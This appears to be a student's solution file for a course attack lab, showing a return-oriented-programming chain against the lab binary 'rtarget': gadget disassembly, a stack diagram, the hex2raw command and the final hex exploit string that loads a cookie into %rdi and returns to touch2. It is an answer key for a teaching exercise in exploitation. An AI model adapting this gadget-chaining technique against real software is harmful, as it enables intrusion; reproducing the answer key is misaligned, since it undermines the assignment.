/*
we are only allowed to use movq, popq, ret and nop. we need to move values 
into registers and go to an address. The strategy is to include the cookie in 
the exploit string. The executed code should pop the stack into %rdi, to pass 
cookie as argument. The code should also pop the stack into %rsp, and ret to go
function touch2.

0000000000401994 <start_farm>:
  401994:	b8 01 00 00 00       	mov    $0x1,%eax
  401999:	c3                   	retq   

000000000040199a <getval_142>:
  40199a:	b8 fb 78 90 90       	mov    $0x909078fb,%eax
  40199f:	c3                   	retq   

00000000004019a0 <addval_273>:
  4019a0:	8d 87 48 89 c7 c3    	lea    -0x3c3876b8(%rdi),%eax
  4019a6:	c3                   	retq   

00000000004019a7 <addval_219>:
  4019a7:	8d 87 51 73 58 90    	lea    -0x6fa78caf(%rdi),%eax
  4019ad:	c3                   	retq   

00000000004019ae <setval_237>:
  4019ae:	c7 07 48 89 c7 c7    	movl   $0xc7c78948,(%rdi)
  4019b4:	c3                   	retq   

00000000004019b5 <setval_424>:
  4019b5:	c7 07 54 c2 58 92    	movl   $0x9258c254,(%rdi)
  4019bb:	c3                   	retq   

00000000004019bc <setval_470>:
  4019bc:	c7 07 63 48 8d c7    	movl   $0xc78d4863,(%rdi)
  4019c2:	c3                   	retq   

00000000004019c3 <setval_426>:
  4019c3:	c7 07 48 89 c7 90    	movl   $0x90c78948,(%rdi)
  4019c9:	c3                   	retq   

00000000004019ca <getval_280>:
  4019ca:	b8 29 58 90 c3       	mov    $0xc3905829,%eax
  4019cf:	c3                   	retq   

00000000004019d0 <mid_farm>:
  4019d0:	b8 01 00 00 00       	mov    $0x1,%eax
  4019d5:	c3                   	retq   


cookie: 0x59b997fa

movq %rax,%rdi ==> 48 89 c7
popq %rax ==> 58
nop ==> 90

0x40 19 ab: "58 90 c3" encodes "popq %rax; nop; ret"
0x40 19 c5: "48 89 c7 c3" encodes "movq %rax, %rdi; ret"
0x40 17 ec: address of touch 2


The stack after getbuf() returns:
---------------------------
|00 00 00 00 00 40 17 ec  | 0x5561dcb8, points to touch2(). 
---------------------------
|00 00 00 00 00 40 19 c5  | 0x5561dcb0, points to "movq %rax,%rdi; ret"
---------------------------
|00 00 00 00 59 b9 97 fa  | 0x5561dca8, the cookie value
---------------------------
|00 00 00 00 00 40 19 ab  | 0x5561dca0, return address after calling getbuf(), points to "popq %rax; nop; ret"
---------------------------
|00 00 00 00 00 00 00 00  |
---------------------------
|00 00 00 00 00 00 00 00  |
---------------------------
|00 00 00 00 00 00 00 00  |
---------------------------
|00 00 00 00 00 00 00 00  |
---------------------------
|00 00 00 00 00 00 00 00  |
---------------------------

./hex2raw < ROP_level2/level2_ROP_solution.txt | ./rtarget -q

*/




00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
ab 19 40 00 00 00 00 00 	/* popq %rax; nop; ret; */
fa 97 b9 59 00 00 00 00		/* cookie 0x59b997fa */
c5 19 40 00 00 00 00 00		/* movq %rax, %rdi */
ec 17 40 00 00 00 00 00		/* touch2 0x4017ec */
